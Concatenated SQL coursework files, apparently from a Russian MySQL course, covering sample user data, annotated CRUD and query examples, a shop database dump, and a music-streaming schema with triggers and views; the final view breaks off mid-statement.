,('Татьяна','Нестерова','<EMAIL>',9413536022,'f','1986-05-01','Казань',NULL,'5eccaf8d7038358b307c14336cd565cb49f365c3','2020-09-25 22:09:27.0')
,('Евгений','Волынкин','<EMAIL>',5752887260,'m','1989-09-16','Москва',NULL,'c2b671c251b4ed3838644585b047d0a1a3704133','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Надежда','Реукова','<EMAIL>',9404156548,'f','1982-12-22','Казань',NULL,'95c0a7d5089c0ccf6fe8c88113462c2ab6950a17','2020-09-25 22:09:27.0')
,('Марина','Лямзина','<EMAIL>',5614317170,'f','1984-02-11','Екатеринбург',NULL,'425f5bab4afc290c1ec5e904cbed27fcf4c97f71','2020-09-25 22:09:27.0')
,('Любовь','Карташова','<EMAIL>',9468369832,'f','1981-12-25','Тольятти',NULL,'4b069e5454103bc745477798dd66ea134c242a92','2020-09-25 22:09:27.0')
,('Алексей','Золототрубов','<EMAIL>',2003010211,'m','1984-08-30','Красноярск',NULL,'2d7566a285d69d24b2ad0753bbaeddc945aecc83','2020-09-25 22:09:27.0')
,('Татьяна','Гуляева','<EMAIL>',9006045417,'f','1989-07-27','Воронеж',NULL,'c4ec50ac1c3064f80f4cfd877ba2563928a33e27','2020-09-25 22:09:27.0')
,('Юлия','Сысоева','<EMAIL>',9613106434,'f','1987-11-14','Новосибирск',NULL,'87acb7a49196ed113ddf732a9a41a1291a68cb87','2020-09-25 22:09:27.0')
,('Александр','Борисов','<EMAIL>',6559915444,'m','1982-05-17','Краснодар',NULL,'10253a915f1b47f3032c84c71d7fd86a5a6624e8','2020-09-25 22:09:27.0')
,('Анатолий','Косинов','<EMAIL>',3036324530,'m','1983-06-01','Самара',NULL,'d1532c3b8e8682bc769b2606320a1a0f54fc5925','2020-09-25 22:09:27.0')
,('Ольга','Меланьина','<EMAIL>',3193637029,'f','1981-05-06','Красноярск',NULL,'6df61ed9ad812e2f327ae87bc855302c28f1c2e0','2020-09-25 22:09:27.0')
,('Ольга','Дубищева','<EMAIL>',3234549546,'f','1987-04-11','Москва',NULL,'4e33f3ac62368f7104b84612d0b1ab518<PASSWORD>','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Федор','Шипко','<EMAIL>',9608691146,'m','1984-06-14','Ростов-на-Дону',NULL,'5ccde04c88913a29f096d5ccfc1e9ec0cce67a71','2020-09-25 22:09:27.0')
,('Татьяна','Севостьянова','<EMAIL>',8065210191,'f','1980-07-11','Новосибирск',NULL,'26a73caff7a0774d854d085586394becd291dc84','2020-09-25 22:09:27.0')
,('Инна','Красникова','<EMAIL>',2141664371,'f','1987-11-03','Казань',NULL,'b6f4fe122245e18ccbdf12bcf354bd693a87fedc','2020-09-25 22:09:27.0')
,('Светлана','Гарьковская','<EMAIL>',9804639490,'f','1981-05-20','Красноярск',NULL,'c6ae3d969345bc2cacf2cf324468e5bae8fd449c','2020-09-25 22:09:27.0')
,('Эльза','Самороковская','<EMAIL>',8894215795,'f','1987-05-10','Красноярск',NULL,'e643ae9bdbefd5da4c4e18a47c46f2db8b33f603','2020-09-25 22:09:27.0')
,('Елена','Орлова','<EMAIL>',3913069006,'f','1988-08-11','Самара',NULL,'5f37954b9fce380080982e51adba07e0718d0052','2020-09-25 22:09:27.0')
,('Галина','Стрельникова','<EMAIL>',3699040307,'f','2020-09-05','Тюмень',NULL,'0b5fcf87309858b956cc164df1a61acf8ca4773a','2020-09-25 22:09:27.0')
,('Светлана','Назарова','<EMAIL>',2811501912,'f','1984-04-07','Омск',NULL,'ad20ef3e300cc51ec105d937689feecfca82b66c','2020-09-25 22:09:27.0')
,('Антон','Шарыкин','<EMAIL>',8866959892,'m','1989-03-04','Санкт-Петербург',NULL,'e28882d420f3f02df4ef85cf57a7900520dd19bf','2020-09-25 22:09:27.0')
,('Ирина','Хусаинова','<EMAIL>',6843424170,'f','1983-12-28','Тольятти',NULL,'b607f0f3ba714a20ee76785f523585be6fa4a022','2020-09-25 22:09:27.0')
;
INSERT INTO communities (name) VALUES
('PHP')
,('Planetaro')
,('Ruby')
,('Vim')
,('Ассемблер в Linux для программистов C')
,('Аффинные преобразования')
,('Биология клетки')
,('Древнекитайский язык')
,('Знакомство с методом математической индукции')
,('Информация, системы счисления')
;
INSERT INTO communities (name) VALUES
('Кодирование текста и работа с ним')
,('Комплексные числа')
,('Лингва де планета')
,('Лисп')
,('Математика случая')
,('Микромир, элементарные частицы, вакуум')
,('Московская олимпиада по информатике')
,('Оцифровка печатных текстов')
,('Реализации алгоритмов')
,('Регулярные выражения')
;
INSERT INTO communities (name) VALUES
('Рекурсия')
,('Русский язык')
,('Создание электронной копии книги в формате DjVu в Linux')
,('Токипона')
,('Учебник логического языка')
,('Что такое вычислительная математика')
,('Электронные таблицы в Microsoft Excel')
,('Эсперанто? Зачем?')
,('Язык Си в примерах')
,('Японский язык')
;
-- CRUD
-- create - insert
-- read - select
-- update - update
-- delete - delete, truncate
-- INSERT... VALUES
INSERT INTO users
(id, firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at)
VALUES
(300,'Сергей','Сергеев','<EMAIL>',123123123,'m','1983-03-21','Саратов',NULL,
'fdkjgsdflskdjfgsdfg142356214','2020-09-25 22:09:27.0');
INSERT INTO users (id,firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
(301,'Дмитрий','Тимашов','<EMAIL>',4513359033,'m','1984-06-19','Казань',NULL,'e6ab5f555555fb26c7c60ddd23c8118307804330','2020-09-25 22:09:27.0')
,(302,'Владислав','Авраменко','<EMAIL>',1874462339,'m','1987-07-07','Москва',NULL,'b25e49362b83833eece7d225717f2e285213bf25','2020-09-25 22:09:27.0')
,(303,'Алексей','Величко','<EMAIL>',2951798252,'m','1984-11-27','Казань',NULL,'07521436ef4b4ad464ed04cdceb99f422bbbd9c5','2020-09-25 22:09:27.0')
,(304,'Артем','Филипцов','<EMAIL>',3237322265,'m','1984-08-04','Краснодар',NULL,'5aac7b105729d4ad431db6a4e73604ecec132fa8','2020-09-25 22:09:27.0')
,(305,'Елена','Колдаева','<EMAIL>',3731144657,'f','1989-08-07','Тюмень',NULL,'ba6c51c3064c20f9de84d4ed69733d9dd408e504','2020-09-25 22:09:27.0')
,(306,'Андрей','Антипов','<EMAIL>',8774858608,'m','1984-09-04','Красноярск',NULL,'16f4e6ac1aedd2d970<PASSWORD>','2020-09-25 22:09:27.0');
-- INSERT ... SET
INSERT INTO users
set
firstname='Евгений',
lastname='Грачев',
email='<EMAIL>',
phone=9744906651,
gender='m',
birthday='1987-11-26',
hometown='Омск',
pass='<PASSWORD>';
-- INSERT ... select
-- insert into communities (name)
-- select name from snet.communities;
-- insert into users (firstname, lastname, email, phone, birthday, hometown, gender, pass)
-- select firstname, lastname, email, phone, birthday, hometown, gender, pass from snet0611_filldb.users
-- order by birthday desc limit 10;
-- select
select * from users; -- выбираем всё
select * from users limit 10; -- выбираем первые 10 записей
select * from users limit 10 offset 10;-- пропускаем первые 10 (offset), выбираем 10
select * from users limit 3,8; -- select * from users limit 8 offset 3;
select lastname, firstname, phone from users; -- выбираем данные из 3х столбцов
select lastname, firstname, phone from users order by lastname desc; -- сортируем по фамилии в алф. порядке asc - возр, desc - убыв.
select hometown, lastname, firstname, phone from users order by hometown desc, lastname asc; -- сортировака по нескольким столбцам с разным направлением сортировки
select 'hello!'; -- используем для вывода строки
select 3*8; -- работают арифметические операторы
select concat(lastname, ' ', firstname) as persons from users;-- склейка строки с пом. ф-ции concat, добавили алиас для столбца в результирующей выборке
select concat(lastname,' ', substring(firstname, 1,1), '.') persons from users; -- "обрезаем" имя до первого символа
select distinct hometown from users; -- получаем только уникальные строки
select * from users where hometown = 'Челябинск';
select lastname, firstname, hometown from users
where hometown = 'Москва' or hometown ='Санкт-Петербург' or hometown ='Нижний Новгород'; -- ограничения where с "или"
select lastname, firstname, hometown, gender from users
where hometown = 'Москва' or gender = 'm'; -- ограничения where с "или"
select lastname, firstname, hometown, gender from users
where hometown = 'Москва' and gender = 'm';-- ограничения where с "и"
select lastname, firstname, hometown from users where hometown in ('Москва', 'Санкт-Петербург', 'Нижний Новгород'); -- in позволяет задавать несколько значений в where
select lastname, firstname, hometown from users where hometown != 'Москва'; -- город НЕ Москва
select lastname, firstname, hometown from users where hometown <> 'Москва'; -- аналогично предыдущему
select lastname, firstname, birthday from users where birthday >= '1985-01-01'; -- условие больше или равно
select lastname, firstname, birthday from users where birthday >= '1985-01-01' and birthday <= '1990-01-01';-- выборка между значениями условий
select lastname, firstname, birthday from users where birthday between '1985-01-01' and '1990-01-01'; -- аналогично предыдущему
select lastname, firstname from users where lastname like 'Ки%'; -- поиск подстроки, начинающейся на "Ки" и содержащей далее 0 или более символов (%)
select lastname, firstname from users where lastname like '%ко'; -- поиск подстроки, заканчивающейся на "ко" и содержащей перед этим 0 или более символов или более символов (%)
select lastname, firstname from users where lastname like 'Ки_еева';
select lastname, firstname from users where lastname like '_____';
select count(*) from users; -- 209
select count(hometown) from users; -- 207
select count(distinct hometown) from users; -- 19
select hometown, count(*) from users group by hometown; -- группируем по городу и считаем, сколько пользователей в каждом городе
select hometown, count(*) from users group by hometown having count(*) >= 10; -- выбираем строки, где пользователей в каждом городе >= 10
-- UPDATE
update users
set
hometown = 'Москва',
gender = 'f'
where hometown is null;
update friend_requests
set status = 'approved'
where initiator_user_id = 11 and target_user_id = 13;
-- DELETE
delete from communities where name = 'Биолог<NAME>';
delete from communities where id between 20 and 30;
delete from communities;
-- TRUNCATE
set foreign_key_checks = 0; -- отключили проверку внешних ключей
truncate table communities;
set foreign_key_checks = 1; -- включить проверку внешних ключей
-- посмотреть код создания таблицы
show create table communities;
CREATE TABLE `communities` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(150) DEFAULT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `id` (`id`),
KEY `name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
-- Разбор ДЗ№3
-- 1)
-- user_id
-- obj_id
-- obj_type ENUM ('user', 'post', 'comment')
-- 2) для каждого объекта создать отдельную таблицу : лайки для пользователей, лайки для постов, лайки для фото...
-- ДЗ п.1
--
-- 1) с помощью alter поставить в табл. friends_reqiests default status requested
-- 2) с помощью alter поставить в табл. переименова create_at в created_at
-- п2. заполнить табл. likes данными
ALTER table postslikes
CHANGE likedornot likeexists char(1);
ALTER table friend_requests
alter status set default 'requested';
update commentslikes
set likedornot = '0'
where likedornot != 1;
update postslikes
set likeexists = '0'
where likeexists != 1;
update photoslikes
set likedornot = '0'
where likedornot != 1;<file_sep>-- MySQL dump 10.13 Distrib 8.0.22, for Win64 (x86_64)
--
-- Host: localhost Database: shop
-- ------------------------------------------------------
-- Server version 8.0.22
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `categories`
--
DROP TABLE IF EXISTS `categories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `categories` (
`id` int NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `categories`
--
LOCK TABLES `categories` WRITE;
/*!40000 ALTER TABLE `categories` DISABLE KEYS */;
INSERT INTO `categories` VALUES (1,'Ibex','Capra ibex'),(2,'Ox, musk','Ovibos moschatus'),(3,'Turtle (unidentified)','unavailable'),(4,'Gonolek, burchell\'s','Laniaurius atrococcineus'),(5,'Phascogale, red-tailed','Phascogale calura'),(6,'Goose, greylag','Anser anser'),(7,'Fox, savanna','Dusicyon thous'),(8,'Lion, mountain','Felis concolor'),(9,'Crowned hawk-eagle','Spizaetus coronatus'),(10,'Bird, bare-faced go away','Lorythaixoides concolor'),(11,'Eurasian red squirrel','Sciurus vulgaris'),(12,'Ibis, puna','Plegadis ridgwayi'),(13,'Burmese brown mountain tortoise','Manouria emys'),(14,'Common zorro','Dusicyon thous'),(15,'Dabchick','Tachybaptus ruficollis'),(16,'Ibex','Capra ibex'),(17,'Moose','Alces alces'),(18,'Alpaca','Lama pacos'),(19,'Arctic hare','Lepus arcticus'),(20,'Three-banded plover','Charadrius tricollaris'),(21,'Marshbird, brown and yellow','Pseudoleistes virescens'),(22,'Tyrant flycatcher','Myiarchus tuberculifer');
/*!40000 ALTER TABLE `categories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `goods`
--
DROP TABLE IF EXISTS `goods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `goods` (
`id` int NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
`quantity` int DEFAULT NULL,
`price` decimal(10,2) DEFAULT NULL,
`categories_id` int NOT NULL,
PRIMARY KEY (`id`,`categories_id`),
KEY `fk_goods_categories_idx` (`categories_id`),
CONSTRAINT `fk_goods_categories` FOREIGN KEY (`categories_id`) REFERENCES `categories` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `goods`
--
LOCK TABLES `goods` WRITE;
/*!40000 ALTER TABLE `goods` DISABLE KEYS */;
INSERT INTO `goods` VALUES (1,'dfghj','lalalalala',8,100500.00,13);
/*!40000 ALTER TABLE `goods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Temporary view structure for view `goodswithcategories`
--
DROP TABLE IF EXISTS `goodswithcategories`;
/*!50001 DROP VIEW IF EXISTS `goodswithcategories`*/;
SET @saved_cs_client = @@character_set_client;
/*!50503 SET character_set_client = utf8mb4 */;
/*!50001 CREATE VIEW `goodswithcategories` AS SELECT
1 AS `id`,
1 AS `name`,
1 AS `description`,
1 AS `categories_name`*/;
SET character_set_client = @saved_cs_client;
--
-- Table structure for table `orders`
--
DROP TABLE IF EXISTS `orders`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `orders` (
`id` int NOT NULL,
`data` date DEFAULT NULL,
`address` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `orders`
--
LOCK TABLES `orders` WRITE;
/*!40000 ALTER TABLE `orders` DISABLE KEYS */;
/*!40000 ALTER TABLE `orders` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `orders_has_goods`
--
DROP TABLE IF EXISTS `orders_has_goods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `orders_has_goods` (
`orders_id` int NOT NULL,
`goods_id` int NOT NULL,
`goods_categories_id` int NOT NULL,
PRIMARY KEY (`orders_id`,`goods_id`,`goods_categories_id`),
KEY `fk_orders_has_goods_goods1_idx` (`goods_id`,`goods_categories_id`),
KEY `fk_orders_has_goods_orders1_idx` (`orders_id`),
CONSTRAINT `fk_orders_has_goods_goods1` FOREIGN KEY (`goods_id`, `goods_categories_id`) REFERENCES `goods` (`id`, `categories_id`),
CONSTRAINT `fk_orders_has_goods_orders1` FOREIGN KEY (`orders_id`) REFERENCES `orders` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `orders_has_goods`
--
LOCK TABLES `orders_has_goods` WRITE;
/*!40000 ALTER TABLE `orders_has_goods` DISABLE KEYS */;
/*!40000 ALTER TABLE `orders_has_goods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Final view structure for view `goodswithcategories`
--
/*!50001 DROP VIEW IF EXISTS `goodswithcategories`*/;
/*!50001 SET @saved_cs_client = @@character_set_client */;
/*!50001 SET @saved_cs_results = @@character_set_results */;
/*!50001 SET @saved_col_connection = @@collation_connection */;
/*!50001 SET character_set_client = utf8mb4 */;
/*!50001 SET character_set_results = utf8mb4 */;
/*!50001 SET collation_connection = utf8mb4_0900_ai_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`root`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `goodswithcategories` (`id`,`name`,`description`,`categories_name`) AS select `g`.`id` AS `id`,`g`.`name` AS `name`,`g`.`description` AS `description`,`c`.`name` AS `categories_id` from (`goods` `g` left join `categories` `c` on((`g`.`categories_id` = `c`.`id`))) */;
/*!50001 SET character_set_client = @saved_cs_client */;
/*!50001 SET character_set_results = @saved_cs_results */;
/*!50001 SET collation_connection = @saved_col_connection */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-12-11 20:15:44
<file_sep>-- Персональная страница пользователя
select
firstname,
lastname,
hometown,
(select filename from photos where id = u.photo_id) as 'personal_photo',
(select count(*) from (select initiator_user_id from friend_requests where target_user_id = u.id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = u.id and status = 'approved') as fr_list) as 'friends',
(select count(*) from friend_requests where target_user_id = u.id and status ='requested') as 'followers',
(select count(*) from photos where user_id = u.id) 'photos'
from users as u
where id = 21;
-- Список друзей пользователя 1 с указанием пола и возраста
select
firstname,
lastname,
timestampdiff(year, birthday, now()) as age,
case(gender)
when 'm' then 'Мужчина'
when 'f' then 'Женщина'
end as 'gender'
from users where id in (select * from (
select
case
when initiator_user_id = 1 and status = 'approved' then target_user_id
when target_user_id = 1 and status = 'approved' then initiator_user_id
end as friend_id
from friend_requests) as fr_list where friend_id is not null);
-- Получить id друзей пользователя номер 1
select initiator_user_id from friend_requests where target_user_id = 1 and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = 1 and status = 'approved';
-- Получить id друзей пользователя номер 2
select * from (
select
case
when initiator_user_id = 1 and status = 'approved' then target_user_id
when target_user_id = 1 and status = 'approved' then initiator_user_id
end as friend_id
from friend_requests) as fr_list where friend_id is not null;
-- непрочитанные сообщения, адресованные пользователю (список)
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
message,
create_at
from messages m
where to_user_id = 30 and is_read = 0;
-- кол-во непрочитанных сообщений, адресованных пользователю 30 от друзей
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
count(*) as total_msg
from messages m
where
from_user_id in (select initiator_user_id from friend_requests where target_user_id = m.to_user_id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = m.to_user_id and status = 'approved')
and
to_user_id = 30
and is_read = 0
group by m.from_user_id order by total_msg desc;
-- среднее кол-во постов, опубликованных каждым пользователем
select avg(total_user_posts) from (select count(*) as total_user_posts from posts group by user_id) as total_users_posts_tbl;
-- архив новостей
select count(*) as total_news, monthname(created_at) as `month` from posts group by `month` order by total_news desc;
-- среднее количество групп у всех пользователей
select (select count(*) from users_communities)/(select count(*) from users);
-- кол-во пользователей на число групп с ненулевым числом пользователей
select (select count(*) from users)/(select count(distinct community_id ) from users_communities);
-- min max
select max(timestampdiff(year, birthday, now())) as age from users;
select timestampdiff(year, birthday, now()) as age from users order by age desc limit 1;
select gender, min(timestampdiff(year, birthday, now())) as age from users group by gender;
-- агрегирующие функции и null
select count(*) from photos;
select count(id) from photos;
select count(description) from photos;
-- Пусть задан некоторый пользователь. Из всех друзей этого пользователя найдите человека, который больше всех общался с нашим пользователем.
-- (если я правильно поняла, то общался это значит, что его сообщения читали)
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
count(*) as total_msg
from messages m
where
from_user_id in (select initiator_user_id from friend_requests where target_user_id = m.to_user_id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = m.to_user_id and status = 'approved')
and
to_user_id = 1
and is_read = 1
group by m.from_user_id order by total_msg desc limit 1;
-- Подсчитать общее количество лайков, которые получили 10 самых молодых пользователей.
-- Total likes received by the 10 youngest users.
-- Strategy: pick the 10 youngest users first (ORDER BY birthday DESC LIMIT 10),
-- then count the likes on each user's posts with a correlated subquery.
-- NOTE(review): only post likes are counted here; commentslikes / photoslikes
-- can be added the same way if "likes" should cover those objects too.
select
    concat(u.firstname, ' ', u.lastname) as username,
    timestampdiff(year, u.birthday, now()) as age,
    (select count(*)
       from postslikes pl
       join posts p on pl.post_id = p.id
      where p.user_id = u.id
        and pl.likeexists = '1') as total_postlikes
from users u
order by u.birthday desc
limit 10;
-- Grand total over the same 10 users (single number).
select sum(total_postlikes) as total_likes
from (
    select (select count(*)
              from postslikes pl
              join posts p on pl.post_id = p.id
             where p.user_id = u.id
               and pl.likeexists = '1') as total_postlikes
    from users u
    order by u.birthday desc
    limit 10
) as youngest10;
-- Определить кто больше поставил лайков (всего) - мужчины или женщины?
-- Найти 10 пользователей, которые проявляют наименьшую активность в использовании социальной сети.
<file_sep>drop database if exists music1;
-- Schema for a Spotify-like media player (author's note: "база данных
-- медиаплеера типа Spotify").
create database music1;
use music1;
-- media-player database, Spotify-style
-- Registered listeners; email, phone and loginname are the lookup keys.
drop table if exists users;
create table users(
id serial primary key, -- serial = bigint unsigned not null auto_increment unique
firstname varchar(20) comment '<NAME>',
lastname varchar(20) comment '<NAME>',
gender char(10),
phone varchar(20) unique,
loginname varchar(30) comment 'Короткое имя или никнейм пользователя',
pass char(20) comment '<PASSWORD>',
birthday date,
country varchar(40),
created_at datetime default now()
);
-- Secondary indexes for the columns users are looked up by.
alter table users add index(phone);
alter table users add index(email);
alter table users add index(loginname);
-- Performers (solo artists or bands).
-- NOTE(review): index(artistsname) is redundant — unique key(artistsname)
-- already creates an index on that column; kept as declared.
drop table if exists artists;
create table artists(
id serial primary key,
artistsname varchar(50) comment 'Имя исполнителя/коллектива',
image_id bigint unsigned,
description text,
unique key(artistsname),
index(artistsname)
);
-- Individual tracks.  Each song belongs to exactly one album (album_id);
-- the FK to albums is added after the albums table is created below.
drop table if exists songs;
create table songs(
id serial primary key,
songname varchar(100) comment 'Название музыкального трека',
album_id bigint unsigned not null,
songnumberonalbum bigint unsigned not null comment 'Порядковый номер песни в оригинальном альбоме',
songduration varchar(10) comment 'Длительность песни',
songfile varchar(200) comment 'Ссылка на непосредственно музыкальный файл в хранилище/ либо сам файл',
genre varchar(50) comment 'Название музыкального жанра',
index(songname),
index(genre)
);
-- Albums/EPs.  Created before the songs FK can be attached.
drop table if exists albums;
create table albums(
id serial primary key,
albumname varchar(50) comment 'Название альбома/EP',
coverimage varchar(200),
yearofrelease bigint,
created_at datetime default now(),
genre varchar(50) comment 'Название музыкального жанра альбома',
index(genre),
index(albumname)
);
-- Deferred FK: songs.album_id -> albums.id (albums now exists).
alter table songs add foreign key (album_id) references albums(id);
-- User-created playlists; created_by references the owning user.
drop table if exists playlists;
create table playlists(
id serial primary key,
playlistname varchar(50) comment 'Название плейлиста',
coverimage varchar(200),
description text,
created_by bigint unsigned not null,
created_at datetime default now(),
index(playlistname)
);
alter table playlists add foreign key (created_by) references users(id);
-- User -> artist subscriptions.  subscribedornot is a '0'/'1' flag so a
-- row can be flipped off instead of deleted (same pattern as the like tables).
drop table if exists subscribes;
create table subscribes(
id serial primary key,
users_id bigint unsigned not null,
artist_id bigint unsigned not null,
subscribedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (artist_id) references artists(id)
);
-- Per-object like tables (option 2 from the homework discussion: one table
-- per likeable entity).  likedornot is a '0'/'1' char flag; updated_at
-- records when the flag was last toggled.
drop table if exists likedsongs;
create table likedsongs(
id serial primary key,
users_id bigint unsigned not null,
song_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (song_id) references songs(id)
);
-- Same structure, but for albums.
drop table if exists likedalbums;
create table likedalbums(
id serial primary key,
users_id bigint unsigned not null,
album_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (album_id) references albums(id)
);
-- Same structure, but for playlists.
drop table if exists likedplaylists;
create table likedplaylists(
id serial primary key,
users_id bigint unsigned not null,
playlist_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (playlist_id) references playlists(id)
);
-- Junction table: songs <-> artists (many-to-many; collaborations allowed).
drop table if exists songperformers;
create table songperformers(
song_id bigint unsigned not null,
artist_id bigint unsigned not null,
primary key (song_id, artist_id),
foreign key (song_id) references songs(id),
foreign key (artist_id) references artists(id)
);
-- Junction table: albums <-> artists (many-to-many).
drop table if exists artistsandalbums;
create table artistsandalbums(
album_id bigint unsigned not null,
artist_id bigint unsigned not null,
primary key (album_id, artist_id),
foreign key (album_id) references albums(id),
foreign key (artist_id) references artists(id)
);
-- Junction table: songs <-> playlists (many-to-many).
-- (Original comment said "songs to albums", but the table clearly links
-- songs to playlists.)
drop table if exists songsonplaylists;
create table songsonplaylists(
song_id bigint unsigned not null,
playlist_id bigint unsigned not null,
songnumberonplaylist bigint unsigned not null, -- track position within the playlist
primary key (song_id, playlist_id),
foreign key (song_id) references songs(id),
foreign key (playlist_id) references playlists(id)
);
-- Play history: one row per listen event (user, song, album, timestamp).
drop table if exists streams;
create table streams(
id serial primary key,
users_id bigint unsigned not null,
song_id bigint unsigned not null,
album_id bigint unsigned not null,
listened_at datetime default current_timestamp,
foreign key (users_id) references users(id),
foreign key (song_id) references songs(id),
foreign key (album_id) references albums(id),
index(song_id) -- play-count aggregations group by song_id
);
<file_sep>use music1;
-- триггер для исправления невалидной даты рождения
-- Clamp future birth dates: if an inserted user claims a birthday after
-- today, replace it with the current date so age arithmetic
-- (timestampdiff) never goes negative.
drop trigger if exists check_user_age_before_insert;
delimiter //
create trigger check_user_age_before_insert before insert on users
for each row
begin
-- NEW is writable in a BEFORE INSERT trigger, so the value is fixed in place.
if new.birthday > current_date() then
set new.birthday = current_date();
end if;
end//
delimiter ;
-- Trigger: keep track positions unique within a playlist.  Any insert that
-- is not explicitly "track 1" gets its position replaced with
-- MAX(existing position) + 1 for that playlist, so manually supplied
-- numbers cannot collide with ones already present.
drop trigger if exists check_songsonplaylists_numbervalidity;
delimiter //
create trigger check_songsonplaylists_numbervalidity before insert on songsonplaylists
for each row
begin
declare maxnumberonplaylist int;
-- BUG FIX: the original body referenced the bare identifier `playlist_id`,
-- which is not valid inside a trigger; the inserted row's column must be
-- addressed as `new.playlist_id`.
if (new.songnumberonplaylist <> 1) and (new.playlist_id is not null) then
-- MAX(...) is NULL for a playlist with no rows yet; coalesce to 0 so the
-- appended track gets position 1 instead of NULL (the column is NOT NULL).
select coalesce(max(songnumberonplaylist), 0) into maxnumberonplaylist
from songsonplaylists
where playlist_id = new.playlist_id;
set new.songnumberonplaylist = maxnumberonplaylist + 1;
end if;
end//
delimiter ;
select MAX(songnumberonplaylist) from songsonplaylists where playlist_id = 15;
-- View: user playlists with the owner's login name instead of the raw
-- created_by id.  LEFT JOIN keeps playlists even if the owner row is missing.
create or replace view usersplaylists(id, playlistname, coverimage, description, created_by) as
select
p.id, p.playlistname, p.coverimage, p.description, u.loginname
from playlists as p
left join users as u
on p.created_by = u.id;
-- Smoke check.
select * from usersplaylists;
-- View: songs matched with their performers and albums.  Driven from
-- songperformers, so only songs that have at least one performer row appear.
create or replace view songalbumartist(id, songname, albumname, artist_id, artistsname) as
select s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id;
-- Smoke check (ordered for readability).
select id, songname, albumname, artistsname from songalbumartist order by id;
-- View: same song/album/artist mapping, but the RIGHT JOIN keeps every artist,
-- so artists without any recorded songs appear as NULL rows.
CREATE OR REPLACE VIEW allsongalbumartist(id, songname, albumname, artist_id, artistsname) AS
SELECT sng.id,
       sng.songname,
       alb.albumname,
       perf.artist_id,
       art.artistsname
  FROM songperformers AS perf
